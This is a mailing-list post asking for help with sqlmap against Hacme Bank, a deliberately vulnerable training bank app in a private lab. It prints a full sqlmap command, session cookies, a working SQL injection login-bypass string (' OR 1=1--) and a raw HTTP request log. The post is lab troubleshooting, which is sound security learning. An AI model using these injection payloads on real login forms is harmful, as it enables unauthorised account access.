Hi all,
I've been playing with sqlmap against Foundstone's Hacme Bank and have been
making some progress.
Here is the command I've come up with:
./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx"
--method=POST -p "txtUserName"
--cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l;
CookieLoginAttempts=5; Admin=false"
--data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit"
-v 5 --prefix="'" --postfix=" OR 1=1--" --batch
I can confirm that this command is able to gain access to the HacmeBank site
with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of
course). Some other crafted strings from sqlmap are successful as well.
BUT, sqlmap doesn't seem to detect that it is successful in gaining access.
I think the problem exists in the --regexp string.....as in I can't find a
regexp that works....
>From the sqlmap docs, --regexp lets the user "provide a string which is *
always* present on the not injected page *and* on all True injected query
pages, but that it is *not* on the False ones". The problem I think am I
running into is finding a string that is present on the not injected page,
but no on the false pages.
The strings that I have been trying to match are:
Not Injected Page: Message"></span>
True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
False Injected Page: Message">Invalid Login</span>
My question is how is the "not injected" page detected? When watching the
output on level 5 verbosity, I see this request. I assume this is the
request to determine the "Not Injected" page?
[11:42:28] [INFO] testing if the provided regular expression matches within
the target URL page content
[11:42:30] [TRAFFIC OUT] HTTP request:
POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Content-length: 105
Accept-language: en-us,en;q=0.5
Connection: Keep-Alive
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.200.11:80 <http://192.168.200.11/>
Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
Admin=false
Content-type: application/x-www-form-urlencoded
__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit
This request sends in the POST data that I provided at the command line.
This data causes an "Invalid Login" from the login page, which is exactly
what happens when a False injected query occurs as well. In fact, the HTML
that comes back from this "Not Injected" request is identical to the HTML
that comes back from a False injected page.
So, in this situation, I feel that sqlmap isn't requesting the "Not
Injected" page correctly. In my mind, that would involve a GET request,
with no login data, to login.aspx, not a POST to that page. The GET should
return a page that doesn't have the "Invalid Login" text that gets returned
to a POST with invalid credentials.
So, can I get sqlmap to detect the "Not Injected" page with a simple GET
request, but then perform the sql injection using POST requests? Or is
there something else that needs done? I tried changing --method to GET, as
well as removing --method, but the GET that is sent for the "Not Injected"
page still contains the POST data, which still results in "Invalid Login".
Or I am confused on how this should work?
Thanks!
Richard
|
